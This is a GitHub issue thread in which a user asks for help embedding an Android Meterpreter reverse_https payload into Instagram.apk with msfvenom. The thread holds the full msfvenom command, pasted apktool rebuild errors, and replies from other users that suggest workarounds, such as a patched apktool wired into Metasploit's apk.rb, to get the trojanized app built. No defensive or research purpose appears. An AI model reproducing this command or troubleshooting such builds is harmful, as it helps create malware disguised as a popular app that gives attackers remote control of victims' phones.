### ISSUE TITLE
Embend Error(Merging two apk)

### ISSUE THREAD

**Issue by Karthi02116K** [gushmazuko/metasploit_in_termux#275]
When I try to call msfvenom for
 **"msfvenom -x Instagram.apk -p android/meterpreter/reverse_https LHOST=localhost LPORT=9876"**
It's  show this error,and I also bold The Error messages

Can help me please 

I: Smaling smali_classes6 folder into classes6.dex...
I: Checking whether resources has changed...
I: Building resources...
brut.androlib.exceptions.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/data/data/com.termux/files/usr/tmp/brut_util_Jar_58159581705938806621375338088680060957.tmp, compile, --dir, /data/data/com.termux/files/usr/tmp/d20240424-5218-avq812/original/res, --legacy, -o, /data/data/com.termux/files/usr/tmp/d20240424-5218-avq812/original/build/resources.zip]
W: /**data/data/com.termux/files/usr/tmp/brut_util_Jar_58159581705938806621375338088680060957.tmp[235**]: **_**syntax**_** _**error:**_ _**unexpected**_ '('
[*] _**Unable**_ _**to**_ _**rebuild**_ _**apk.**_ _**Trying**_ _**rebuild**_ _**with**_ _**AAPT2..**_
**_[-] I: Using Apktool 2.9.3_**
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
brut.androlib.exceptions.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/data/data/com.termux/files/usr/tmp/brut_util_Jar_47824622988290943071271749801106405940.tmp, compile, --dir, /data/data/com.termux/files/usr/tmp/d20240424-5218-avq812/original/res, --legacy, -o, /data/data/com.termux/files/usr/tmp/d20240424-5218-avq812/original/build/resources.zip]
W: **_/data/data/com.termux/files/usr/tmp/brut_util_Jar_47824622988290943071271749801106405940.tmp[235]: syntax error: unexpected '('
Error: Unable to rebuild apk with **apktool.**_**

**Comment by Rdxcj** [comment]
@Karthi02116K looks like you have to open issue in metasploit no here i guess, or do it manually with [ApkEditor](https://github.com/REAndroid/APKEditor)

**Comment by Karthi02116K** [comment]
> @Karthi02116K looks like you have to open issue in metasploit not here i guess, or do it manually with [ApkEditor](https://github.com/REAndroid/APKEditor)

Yes,I also try it,but not working
What I have to do next

**Comment by ExelentHA1** [comment]
I have this issue last month. Apparently there's a bug when rebuilding an apk using the latest apktool, its fine decompiling tho. You can use the termux patched apktool, and modify the apk.rb so that when rebuilding an apk, the termux one is the one rebuilding.
